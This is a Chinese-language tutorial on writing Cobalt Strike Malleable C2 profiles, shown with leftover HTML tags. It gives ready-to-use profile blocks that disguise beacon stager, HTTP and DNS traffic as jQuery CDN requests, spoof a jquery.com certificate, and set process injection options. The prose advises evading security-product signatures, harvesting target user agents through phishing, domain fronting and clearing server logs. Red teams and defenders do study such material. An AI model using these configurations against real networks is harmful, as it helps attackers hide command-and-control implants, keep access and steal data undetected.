Cobalt Strike Malleable C2 配置文件深度解析与实战指南<\/h1>

1. Malleable C2 配置文件概述<\/h2>

Cobalt Strike 最强大的功能之一就是可以通过 Malleable C2 配置文件修改 Beacon payload 的行为。这种配置文件允许操作者：<\/p>

修改 Beacon 的内存占用<\/li>
更改检入频率<\/li>
定制网络流量特征<\/li>

模拟合法应用程序行为<\/li> <\/ul>

2. 基础使用原则<\/h2>

2.1 核心建议<\/h3>

永远不要使用默认值<\/strong>：必须使用自定义配置文件<\/li>
修改示例配置文件<\/strong>：不要直接使用公开的配置文件，因为它们可能已被安全产品签名<\/li>
注意流量模式<\/strong>：即使使用配置文件，仍会产生"beaconing"网络流量模式<\/li>

充分测试<\/strong>：在实际使用前必须进行彻底测试<\/li> <\/ol>
2.2 语法规范<\/h3>

使用双引号而非单引号：
set useragent "Mozilla\/5.0"<\/span>; \/\/ 正确 <\/span><\/span><\/span><\/span>set useragent '<\/span>Mozilla\/<\/span>5.0<\/span>'<\/span>; \/\/ 错误 <\/span><\/span><\/span><\/code><\/pre><\/li> 允许使用分号： prepend "This is an example;"<\/span>; <\/span><\/span><\/code><\/pre><\/li> 转义特殊字符： append "here is <\/span>\"<\/span>some<\/span>\"<\/span> stuff"<\/span>; <\/span><\/span>append "more <\/span>\\<\/span> stuff"<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ul> 3. 配置文件结构详解<\/h2> 3.1 基本配置项<\/h3> 3.1.1 配置文件名称<\/h4> set profile "jQuery C2 Profile"<\/span>; <\/span><\/span><\/code><\/pre> 仅用于标识，不影响实际功能<\/li> <\/ul> 3.1.2 Sleep 时间设置<\/h4> set sleeptime "60000"<\/span>; \/\/ 默认检入间隔(毫秒) <\/span><\/span><\/span><\/span>set jitter "20"<\/span>; \/\/ 随机抖动百分比 <\/span><\/span><\/span><\/code><\/pre> 建议值：60秒+20%抖动<\/li> 太规律的间隔容易被检测<\/li> <\/ul> 3.1.3 用户代理(User-Agent)<\/h4> set useragent "Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/70.0.3538.102 Safari\/537.36 Edge\/18.18362"<\/span>; <\/span><\/span><\/code><\/pre> 最佳实践：从目标环境捕获真实 User-Agent<\/li> 可通过钓鱼邮件等方式获取<\/li> <\/ul> 3.1.4 SSL 证书配置<\/h4> https-<\/span>certificate { <\/span><\/span> set CN "jquery.com"<\/span>; <\/span><\/span> set O "jQuery Foundation"<\/span>; <\/span><\/span> set C "US"<\/span>; <\/span><\/span> set L "Boston"<\/span>; <\/span><\/span> set OU "Web Framework"<\/span>; <\/span><\/span> set ST "Massachusetts"<\/span>; <\/span><\/span> set validity "365"<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre> 建议使用 Let's Encrypt 等可信证书<\/li> 对于 Domain Fronting，团队服务器需要有效 SSL 证书<\/li> <\/ul> 3.1.5 SpawnTo 进程设置<\/h4> set spawnto_x86 "%windir%<\/span>\\<\/span>sysnative<\/span>\\<\/span>svchost.exe -k localservice -p -s fdPHost"<\/span>; <\/span><\/span>set spawnto_x64 "%windir%<\/span>\\<\/span>sysnative<\/span>\\<\/span>svchost.exe -k localservice -p -s fdPHost"<\/span>; <\/span><\/span><\/code><\/pre> 选择指南：使用受保护的二进制文件<\/li> 避免触发 UAC 的二进制<\/li> 架构匹配(x86\/x64)<\/li> 选择通常会建立网络连接的进程<\/li> <\/ul> <\/li> <\/ul> 3.2 通信渠道配置<\/h3> 3.2.1 SMB 信标<\/h4> pipe { <\/span><\/span> set name "<\/span>\\\\<\/span>.<\/span>\\<\/span>pipe<\/span>\\<\/span>mshtml<\/span>\\<\/span>mswsock"<\/span>; <\/span><\/span> set max_instances "1"<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre> 避免使用默认管道名称<\/li> 用于主机间点对点通信<\/li> <\/ul> 3.2.2 DNS 信标<\/h4> dns { <\/span><\/span> set beacon "cdn.jquery.com"<\/span>; <\/span><\/span> set max_ttl "300"<\/span>; <\/span><\/span> set sleep "0"<\/span>; <\/span><\/span> set data "A"<\/span>; <\/span><\/span> set sub "cdn.jquery.com"<\/span>; <\/span><\/span> set ttl "300"<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre> 通常用作低速备份通道<\/li> 容易被检测但常是防御盲点<\/li> <\/ul> 3.3 分段过程(Staging)<\/h3> 3.3.1 HTTP Stager<\/h4> http-<\/span>stager { <\/span><\/span> set uri_x86 "\/jquery-3.3.1.slim.min.js"<\/span>; <\/span><\/span> set uri_x64 "\/jquery-3.3.2.slim.min.js"<\/span>; <\/span><\/span> <\/span><\/span> client { <\/span><\/span> header "Accept"<\/span> "*\/*"<\/span>; <\/span><\/span> header "Referer"<\/span> "https:\/\/code.jquery.com\/"<\/span>; <\/span><\/span> header "Accept-Language"<\/span> "en-US,en;q=0.9"<\/span>; <\/span><\/span> <\/span><\/span> metadata { <\/span><\/span> netbios; <\/span><\/span> prepend "var _0xae5b=["<\/span>; <\/span><\/span> append "];"<\/span>; <\/span><\/span> parameter "v"<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> server { <\/span><\/span> header "Content-Type"<\/span> "application\/javascript; charset=utf-8"<\/span>; <\/span><\/span> header "Server"<\/span> "NetDNA-cache\/2.2"<\/span>; <\/span><\/span> header "X-Cache"<\/span> "HIT"<\/span>; <\/span><\/span> <\/span><\/span> output { <\/span><\/span> prepend "(function(){"<\/span>; <\/span><\/span> append "})();"<\/span>; <\/span><\/span> print; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 模拟 CDN 请求样式<\/li> 可修改为其他 CDN 如 Microsoft jQuery CDN<\/li> 考虑使用无分段(stageless)payload 以避免触发警报<\/li> <\/ul> 3.4 HTTP 通信配置<\/h3> 3.4.1 HTTP-GET<\/h4> http-<\/span>get { <\/span><\/span> set uri "\/jquery-3.3.1.min.js"<\/span>; <\/span><\/span> <\/span><\/span> client { <\/span><\/span> header "Accept"<\/span> "*\/*"<\/span>; <\/span><\/span> header "Cookie"<\/span> "__cfduid=CDA7B23B5D3F3D4A8A4A8A4A8A4A8A4A"<\/span>; <\/span><\/span> <\/span><\/span> metadata { <\/span><\/span> base64; <\/span><\/span> header "If-None-Match"<\/span>; <\/span><\/span> parameter "callback"<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> server { <\/span><\/span> header "Content-Type"<\/span> "application\/javascript; charset=utf-8"<\/span>; <\/span><\/span> header "Cache-Control"<\/span> "public, max-age=14400"<\/span>; <\/span><\/span> header "ETag"<\/span> "<\/span>\"<\/span>5b255987-5eef<\/span>\"<\/span>"<\/span>; <\/span><\/span> <\/span><\/span> output { <\/span><\/span> prepend "jQuery(function(){"<\/span>; <\/span><\/span> append "});"<\/span>; <\/span><\/span> print; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 可设置多个 URI 增加多样性<\/li> Beacon 在分段时会被分配固定 URI<\/li> <\/ul> 3.4.2 HTTP-POST<\/h4> http-<\/span>post { <\/span><\/span> set uri "\/jquery-3.3.1.min.js"<\/span>; <\/span><\/span> set verb "POST"<\/span>; <\/span><\/span> <\/span><\/span> client { <\/span><\/span> header "Content-Type"<\/span> "application\/x-www-form-urlencoded"<\/span>; <\/span><\/span> header "Accept"<\/span> "*\/*"<\/span>; <\/span><\/span> <\/span><\/span> id { <\/span><\/span> parameter "id"<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> output { <\/span><\/span> print; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> server { <\/span><\/span> header "Content-Type"<\/span> "application\/javascript; charset=utf-8"<\/span>; <\/span><\/span> header "Server"<\/span> "NetDNA-cache\/2.2"<\/span>; <\/span><\/span> <\/span><\/span> output { <\/span><\/span> prepend "jQuery(function(){"<\/span>; <\/span><\/span> append "});"<\/span>; <\/span><\/span> print; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre> 可修改为 GET-only 模式(注释 POST 部分)<\/li> GET-only 在大数据传输时可能有问题<\/li> <\/ul> 3.5 内存规避技术<\/h3> transform-<\/span>x86 { <\/span><\/span> prepend "<\/span>\x90\x90\x90\x90<\/span>"<\/span>; \/\/ NOP sled <\/span><\/span><\/span><\/span>} <\/span><\/span>transform-<\/span>x64 { <\/span><\/span> prepend "<\/span>\x90\x90\x90\x90<\/span>"<\/span>; \/\/ NOP sled <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>process-<\/span>inject { <\/span><\/span> set allocator "VirtualAllocEx"<\/span>; <\/span><\/span> set min_alloc "8192"<\/span>; <\/span><\/span> set startrwx "false"<\/span>; <\/span><\/span> set userwx "false"<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre> 使用 peclone 工具提取合法进程内存特征<\/li> 参考"In-Memory Evasion"技术<\/li> <\/ul> 4. 配置文件开发流程<\/h2> 4.1 选择主题<\/h3> 分析目标环境网络流量<\/li> 选择常见、可信的应用程序进行模拟<\/li> 示例：jQuery、CDN流量、云服务API等<\/li> <\/ul> 4.2 创建配置文件<\/h3> 基于现有模板修改<\/li> 参考 GitHub 上的示例<\/li> 逐步调整各模块配置<\/li> <\/ol> 4.3 验证与测试<\/h3> 4.3.1 使用 c2lint<\/h4> .\/c2lint jquery-c2.3.11.profile <\/span><\/span><\/code><\/pre>4.3.2 手动测试流程<\/h4> 启动 Wireshark 捕获流量<\/li> 使用测试配置文件启动团队服务器<\/li> 创建 HTTP 和 SMB 监听器<\/li> 使用 Scripted Web Delivery 部署 Beacon<\/li> 测试各种 Beacon 功能：生成不同架构的 Beacon<\/li> 执行常见命令(keylogger、screenshot等)<\/li> 检查流量特征是否符合预期<\/li> <\/ul> <\/li> <\/ol> 5. 高级技巧与最佳实践<\/h2> 流量混合<\/strong>：结合 Domain Fronting 等技术<\/li> 动态变化<\/strong>：使用多个 URI 和 User-Agent<\/li> 环境适配<\/strong>：根据目标网络调整 sleep 时间和抖动<\/li> 日志清理<\/strong>：配置清除团队服务器日志<\/li> 备用通道<\/strong>：设置 DNS 或 SMB 作为备份<\/li> <\/ol> 6. 参考资源<\/h2> 官方 Malleable C2 文档<\/a><\/li> 如何编写 Malleable C2 配置文件<\/a><\/li> 随机化 Malleable C2 配置文件生成器<\/a><\/li> 内存规避技术<\/a><\/li> Malleable 命令与控制<\/a><\/li> <\/ol>